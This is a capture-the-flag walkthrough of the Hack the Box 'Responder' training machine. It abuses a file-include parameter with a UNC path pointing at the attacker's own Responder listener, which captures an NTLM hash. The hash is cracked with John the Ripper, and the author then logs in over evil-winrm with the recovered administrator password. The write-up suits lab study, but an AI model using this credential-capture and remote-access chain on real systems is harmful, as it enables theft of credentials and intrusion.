Hack the Box – Responder
# Information:
Platform Name: Hack the Box
Machine Challenge: Responder
Machine Status: Starting Point
Challenge Level: Very Easy
# Used Tools:
- Linux
- nmap
- wappalyzer
- Responder
- WinRM
# Challenge Description:
This challenge has a list of questions that need to be answered in order to retrieve the flag. We will answer every question.
# Writeup:
Task 1:
“When visiting the web service using the IP address, what is the domain that we are being redirected to?“
Answer: The domain is unika.htb.
I entered the IP on google and I was presented with the following:
As you can see in image 1, the search bar says “unika.htp”. However, in my case I couldn’t access the site. So, what I did was add the IP Address to the hosts file.
Note: The hosts file is used to translate a host name into its internet address.
To add the IP Address to the hosts file I used the text editor called nano and added the path to the file. Like so:
The output was the following:
After this, I went back to the site, did refresh and it was possible to access the site as you can see.
Task 2:
“Which scripting language is being used on the server to generate webpages?“
Answer: The scripting language is php.
To know the answer to this question, I used a tool called “wappalyzer”. This tool tells you what technologies a website is built with. You can see this in the image below.
Task 3:
“What is the name of the URL parameter which is used to load different language versions of the webpage?“
Answer: The name is page.
To know the name of the parameter used to load different language versions, I went to the site and clicked where it says “EN” and changed the language to “FR” . By doing this, the URL that appears in the search bar changed and I could see that the name of the parameter is “page”. See this in the image below:
Task 4:
Local File Include is a security vulnerability that happens when a website allows a user to input a file path as part of the URL or (in our case) a parameter. Knowing this, we know that the answer is the 3ยช value.
In the image below, you can see how the parameter “page” stays:
And the output is:
In image 8, you can read the contents of our target hosts file.
Task 5:
Remote File Include is a vulnerability in web applications where attackers can include remote files and those files can be used to execute malicious code or access sensitive information.
Task 6:
“What does NTLM stand for?“
Answer: NTLM stands for New Technology LAN Manager.
NTLM is a protocol used for authentication on windows networks, and it verifies the identity of users and computers attempting to access resources like files or applications.
NTLM functions like this:
Imagine that you are trying to access network resources, the server will ask you for a password. When you provide your password, it will be turned into a hash and the server will receive your hash. The server then checks your hashed value against its own hashed version. If the hashed values match you’re in and a secret code is created to keep your communication private while you’re connected.
Now that we know this, we can use the tool responder to capture our targets authentication credential.
Task 7:
“Which flag do we use in the Responder utility to specify the network interface?“
Answer: The flag is -I.
Note: If you don’t have yet the tool responder, you can download responder with the following command:
git clone https://github.com/lgandx/Responder
You will have something like this:
After having responder installed, we change of directory to the Responder directory with the command “cd Responder”. Then we can run Responder like so:
sudo python3 Responder.py -I tun0
In the command above, don’t forget that the switch “-I” is the answer to this task and the network interface is equal tun0. You can see this by writing on your terminal: “Responder -h”.
Now, when you run the Responder you’ll have something like this:
Responder will be listening and waiting for a connection. You can see that in the image below.
Now, here is where we use the value that we’ve talked about in task 5. So, you copy that value and go back to the web site. Then put the parameter “page” equals to that value (that is in green ). Like so:
http://unika.htb/index.php?page=//<your_tun0_here>/somefile
Note: To know your tun0 you can write on your terminal the ‘ifconfig’ command or go to Hack The Box website; then you click on the button that says ‘Starting Point’; Then you click where it says ‘Starting Point’; and then you’ll have your tun0 there, where it says ‘IP ADDRESS’.
Well, after setting the parameter named “page” equals to the value, the output will be like this:
Because we performed an action in the site (as you can see on image 11), our responder session caught this action, as you can see in the image below.
With Responder we could retrieve the hash of the administrator.
Task 8:
“There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john
, but the full name is what?.“
Answer: The full name is John The Ripper.
To discover the administrator’s password we use the tool John The Ripper. But before we do that, we need to copy and paste the hash to a file to use on John The Ripper.
We can do that like so:
We can verify if the hash e correctly saved like so:
And now we can crack the administrator’s password with the following command:
john --wordlist=/path/to/the/wordlists/rockyou.txt <insert_here_the_file_that_you_create_with_the_hash>.txt
You can see this in the image below:
Task 9:
“What is the password for the administrator user?“
Answer: The password is badminton.
You can see this in image 15.
Task 10:
“We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?“
Answer: The port is 5985.
You can see this on our nmap scan.
So, we now know the password of the Administrator so we can try to connect using WinRM like so:
evil-winrm -i <Your_IP_here> -u administrator -p badminton
You can see the output in the image below:
Note: I only could perform evil-winrm with a TCP protocol connection. with UDP it was giving me the following errors:
So make sure to download the TCP protocol on HTB.
After establishing a connection (using WinRM), I did a bit of research to know the commands that I could use. To list files and directories we can use the command dir. This is the output:
I listed the contents of the directories: Documents, Administrator and Users. There wasn’t anything interesting on the directories Documents and Administrator (you can see this in image 18).
Then I went to the users directory and found a user named mike (as you can see).
So I explored that directory and and inside there was another directory named Desktop. Once again I did cd (change directory) to desktop and listed the contents. And there it was our flag. To see the flag I used the command:
cat flag.txt
You can see it in the image below:
Submit root flag:
Thank you very much for reading!
Cheers,
SoBatista